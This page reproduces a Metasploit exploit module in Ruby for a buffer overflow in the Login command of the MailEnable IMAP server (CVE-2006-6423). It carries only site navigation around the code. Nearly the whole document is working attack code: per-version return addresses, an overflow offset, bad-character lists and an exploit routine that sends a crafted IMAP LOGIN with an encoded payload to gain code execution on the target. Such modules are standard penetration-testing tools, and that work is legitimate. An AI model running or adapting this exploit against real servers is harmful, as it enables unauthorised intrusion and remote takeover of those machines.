Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/imap/mailenable_login.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = GreatRanking
8
9
include Msf::Exploit::Remote::Tcp
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow',
16
'Description' => %q{
17
MailEnable's IMAP server contains a buffer overflow
18
vulnerability in the Login command.
19
},
20
'Author' => [ 'MC' ],
21
'License' => MSF_LICENSE,
22
'References' => [
23
[ 'CVE', '2006-6423'],
24
[ 'OSVDB', '32125'],
25
[ 'BID', '21492']
26
],
27
'Privileged' => true,
28
'DefaultOptions' => {
29
'EXITFUNC' => 'thread',
30
},
31
'Payload' => {
32
'Space' => 450,
33
'BadChars' => "\x00\x0a\x0d\x20",
34
'StackAdjustment' => -3500,
35
},
36
'Platform' => 'win',
37
'Targets' => [
38
39
[
40
'MailEnable 2.35 Pro',
41
{
42
'Ret' => 0x10049abb,
43
}
44
], # MEAISP.DLL
45
46
[
47
'MailEnable 2.34 Pro',
48
{
49
'Ret' => 0x76095d68,
50
'Offset' => 556,
51
}
52
], # push esp # ret | ascii {PAGE_EXECUTE_READ} [MSVCP60.dll]
53
],
54
'DisclosureDate' => '2006-12-11',
55
'DefaultTarget' => 0,
56
'Notes' => {
57
'Reliability' => UNKNOWN_RELIABILITY,
58
'Stability' => UNKNOWN_STABILITY,
59
'SideEffects' => UNKNOWN_SIDE_EFFECTS
60
}
61
)
62
)
63
64
register_options([ Opt::RPORT(143) ])
65
end
66
67
def exploit
68
connect
69
70
auth = "a001 LOGIN " + rand_text_alpha_upper(4) + " {10}\r\n"
71
sploit = rand_text_alpha_upper(556) + [target.ret].pack('V')
72
sploit << payload.encoded + "\r\n\r\n"
73
74
res = sock.recv(50)
75
if (res =~ / OK IMAP4rev1/)
76
print_status("Trying target #{target.name}...")
77
sock.put(auth)
78
sock.get_once(-1, 3)
79
sock.put(sploit)
80
else
81
print_status("Not running IMAP4rev1...")
82
end
83
84
handler
85
disconnect
86
end
87
end
88
89